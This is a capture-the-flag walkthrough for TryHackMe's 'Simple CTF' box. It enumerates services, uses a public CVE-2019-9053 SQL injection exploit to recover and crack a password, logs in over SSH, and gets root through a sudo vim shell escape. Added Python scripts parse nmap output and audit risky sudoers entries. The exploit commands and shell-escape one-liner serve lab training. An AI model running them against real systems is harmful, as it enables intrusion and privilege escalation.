THM Simple CTF

How many services are running under port 1000?

nmap -sV 10.82.188.38
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
21/tcp   open  tcpwrapped
80/tcp   open  tcpwrapped
2222/tcp open  tcpwrapped

Answer 2
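As an added illustration (not part of the original writeup), the small parser below reads nmap's normal output, as quoted above, into structured records so the question can be answered from the data rather than by eye. The sample output is the writeup's own scan result embedded inline; the regex and function names are my own. One caveat worth knowing: "tcpwrapped" means the TCP handshake completed but the service closed the connection before nmap's version probes got a banner, so the SERVICE column here is not authoritative and the ssh guess for 2222 rests on later probing, not on this scan.

```python
import re

# Constructed sample: the nmap -sV output quoted in the writeup, embedded
# inline so the parser runs offline.
NMAP_OUTPUT = """\
Not shown: 997 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
21/tcp   open  tcpwrapped
80/tcp   open  tcpwrapped
2222/tcp open  tcpwrapped
"""

# One port line: "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text):
    """Return a list of (port, proto, state, service, version) tuples.

    Header and summary lines do not match the port pattern and are skipped.
    """
    results = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, state, service, version = m.groups()
        results.append((int(port), proto, state, service, version or ""))
    return results


def open_ports_below(text, limit=1000):
    """Open ports numbered below `limit` (the question asks about port 1000)."""
    return sorted(
        port
        for port, _proto, state, _svc, _ver in parse_nmap(text)
        if state == "open" and port < limit
    )


def count_services_below(text, limit=1000):
    return len(open_ports_below(text, limit))


def highest_open_port(text):
    """The highest open port, i.e. the 'higher port' the next question refers to."""
    return max(port for port, _p, state, _s, _v in parse_nmap(text) if state == "open")


if __name__ == "__main__":
    print("services under 1000:", count_services_below(NMAP_OUTPUT))
    print("highest open port:", highest_open_port(NMAP_OUTPUT))
```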

What is running on the higher port?

Answer ssh

What's the CVE you're using against the application?

Let's try scanning the host for any common exploits found with the vuln script

nmap -sV --script vuln 10.82.188.38

Nothing was found, so maybe there is a hidden directory with an upload form or other input we can exploit

gobuster dir -u 10.82.188.38 -w /usr/share/wordlists/dirb/common.txt  -x php,html,js,txt,asp,aspx,jsp
/robots.txt           (Status: 200) [Size: 929]
/simple               (Status: 301) [Size: 313] [--> http://10.82.188.38/simple/]

It looks like CMS Made Simple 2.2.8 is running at /simple/, so we can likely use the SQL injection reported in CVE-2019-9053. There is also the name mike in robots.txt.

Answer CVE-2019-9053

To what kind of vulnerability is the application vulnerable?

Answer sqli

What's the password?

git clone https://github.com/Perseus99999/CVE-2019-9053-working-.git
cd CVE-2019-9053-working-
python3 exploit.py -u http://10.82.188.38/simple/ --crack -w /usr/share/wordlists/rockyou.txt

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
[+] Password cracked: secret

Answer secret

Where can you login with the details obtained?

Looking at the page, there is a button that takes you to the admin login page, which you can log in to, but you can also log in via SSH.

ssh -p 2222 mitch@10.82.188.38

Answer ssh

What's the user flag?

cat ./user.txt

Answer G00d j0b, keep up!

Is there any other user in the home directory? What's its name?

ls /home

Answer sunbath

What can you leverage to spawn a privileged shell?

sudo -ll

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
    /usr/bin/vim

It looks like we can run vim as root without a password, so let's check GTFOBins for a shell escape.

sudo vim -c ':!/bin/sh'
whoami ; id

root
uid=0(root) gid=0(root) groups=0(root)

Answer vim
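From the defender's side, the sudoers entry above is exactly the kind of finding a configuration audit should raise automatically. The following script is an added example, not part of the original writeup: it parses the long-form `sudo -ll` output quoted above into entries and flags any that run as root, skip authentication (`!authenticate`), and launch a binary with a documented shell escape. The sample output embeds the writeup's entry plus a constructed benign entry; the list of shell-escape binaries is an illustrative subset of what GTFOBins catalogues, and the function names are my own.

```python
import os

# Constructed sample: the 'sudo -ll' entry quoted in the writeup, plus a
# second (constructed) entry so the audit has a benign case to leave alone.
SUDO_LL_OUTPUT = """\
User mitch may run the following commands on Machine:

Sudoers entry:
    RunAsUsers: root
    Options: !authenticate
    Commands:
    /usr/bin/vim

Sudoers entry:
    RunAsUsers: root
    Commands:
    /usr/bin/systemctl restart nginx
"""

# Illustrative subset of binaries with a documented shell escape on GTFOBins;
# a real audit would load the full catalogue instead.
SHELL_ESCAPE_BINARIES = {
    "vim", "vi", "nano", "less", "more", "man",
    "find", "awk", "perl", "python", "python3",
}


def parse_sudo_ll(text):
    """Split 'sudo -ll' output into entries: {runas, options, commands}."""
    entries = []
    current = None
    in_commands = False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Sudoers entry:":
            current = {"runas": "", "options": [], "commands": []}
            entries.append(current)
            in_commands = False
        elif current is None or not line:
            continue  # header text before the first entry, or blank separators
        elif line.startswith("RunAsUsers:"):
            current["runas"] = line.split(":", 1)[1].strip()
            in_commands = False
        elif line.startswith("Options:"):
            current["options"] = line.split(":", 1)[1].split()
            in_commands = False
        elif line == "Commands:":
            in_commands = True
        elif in_commands:
            current["commands"].append(line)
    return entries


def audit_entries(entries):
    """Return (severity, runas, command) findings for risky entries.

    HIGH: root, no password required, binary can spawn a shell.
    MEDIUM: same binary but a password is still required or target is not root.
    """
    findings = []
    for entry in entries:
        no_auth = "!authenticate" in entry["options"]
        for cmd in entry["commands"]:
            binary = os.path.basename(cmd.split()[0])
            if binary in SHELL_ESCAPE_BINARIES:
                severity = "HIGH" if (no_auth and entry["runas"] == "root") else "MEDIUM"
                findings.append((severity, entry["runas"], cmd))
    return findings


if __name__ == "__main__":
    for severity, runas, cmd in audit_entries(parse_sudo_ll(SUDO_LL_OUTPUT)):
        print(f"[{severity}] runs as {runas} without a shell-safe binary: {cmd}")
```

The remediation the finding points at is to drop the `!authenticate` (NOPASSWD) option and not to grant an interactive editor as root at all; if a user genuinely needs to edit a root-owned file, `sudoedit` lets the editor run as the invoking user on a temporary copy, so the editor's shell escape never runs with root privileges.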

What's the root flag?

cat /root/root.txt

Answer W3ll d0n3. You made it!